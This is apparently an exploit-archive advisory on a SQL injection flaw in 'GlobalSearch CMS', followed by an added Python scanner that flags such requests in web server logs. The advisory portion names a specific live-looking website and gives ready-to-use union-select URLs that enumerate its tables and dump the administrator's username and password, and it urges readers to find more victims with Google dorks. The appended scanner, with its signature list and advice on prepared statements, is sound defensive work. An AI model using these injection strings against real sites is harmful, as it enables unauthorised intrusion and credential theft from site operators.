Global Search CMS Sql Injection Vulnerability
Posted on 30 November -0001
[+] Exploit Title : GlobalSearch CMS Sql Injection Vulnerability
[+] Exploit Author : N_H
[+] Date : 2016/08/13
[+] Tested on : MacOS , Windows , Ubuntu
[+] Google Dork : None
[+] Home Page : http://www.globalsearch.com.hk
[+] Category : Web Application
[+] Discovered by : N_H
[+] Description : A SQL injection vulnerability was discovered in GlobalSearch CMS websites by N_H. This vulnerability affects all websites running this United Kingdom CMS. Thousands of websites around the world now run on this content management system (CMS).
[+] For example, one of the sites vulnerable to this bug that we investigated ...

--------------------------------------------------------------------------------------------------
Target : http://www.innogreen.com.hk
Vulnerable Location : http://www.innogreen.com.hk/system.php?id=20
Columns Number : http://www.innogreen.com.hk/system.php?id=20+order+by+2--
Tables of website : http://www.innogreen.com.hk/system.php?id=20+union+select+group_concat%28table_name%29,2+from+information_schema.tables+where+table_schema=database%28%29--
User and Password of Administrator : http://www.innogreen.com.hk/system.php?id=20+union+select+group_concat%28user,0x3a,password%29,2+from+mcy_admin--
--------------------------------------------------------------------------------------------------

[+] Warning : You can find more vulnerable websites running this CMS with your own creative Google Dorks and other methods. In this exploit we injected one vulnerable website as an example.
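For site operators, the request patterns in this advisory are easy to spot in web server access logs. The following is an added example, not part of the original advisory or of the CMS: it assumes common-log-format lines and that `id` is meant to be a plain integer; the names `scan`, `SIGNATURES`, `/news.php` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation-range placeholders.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [13/Aug/2016:10:00:01 +0000] "GET /system.php?id=20 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [13/Aug/2016:10:02:17 +0000] "GET /system.php?id=20+order+by+2-- HTTP/1.1" 200 5120',
    '192.0.2.44 - - [13/Aug/2016:10:02:40 +0000] "GET /system.php?id=20+union+select+'
    'group_concat%28table_name%29,2+from+information_schema.tables+where+'
    'table_schema=database%28%29-- HTTP/1.1" 200 6011',
    '192.0.2.77 - - [13/Aug/2016:10:05:00 +0000] "GET /news.php?page=3 HTTP/1.1" 200 2048',
])

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Markers taken from the request strings shown in the advisory.
SIGNATURES = {
    "order_by": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}

def scan(log_text, numeric_params=("id",)):
    """Return (client, path, param, reasons) for every non-integer value of a
    parameter that should be an integer, after URL-decoding the query string."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        url = urlsplit(m.group(1))
        # parse_qs turns '+' into spaces and decodes %XX escapes.
        params = parse_qs(url.query, keep_blank_values=True)
        for name in numeric_params:
            for value in params.get(name, []):
                if re.fullmatch(r"[0-9]+", value):
                    continue  # well-formed integer, nothing to report
                reasons = sorted(k for k, rx in SIGNATURES.items() if rx.search(value))
                findings.append((client, url.path, name, reasons or ["non_numeric"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit is a signal to investigate, not a fix: the server-side remedy is to reject any `id` that is not an integer and to pass it to the database through a prepared statement instead of string concatenation.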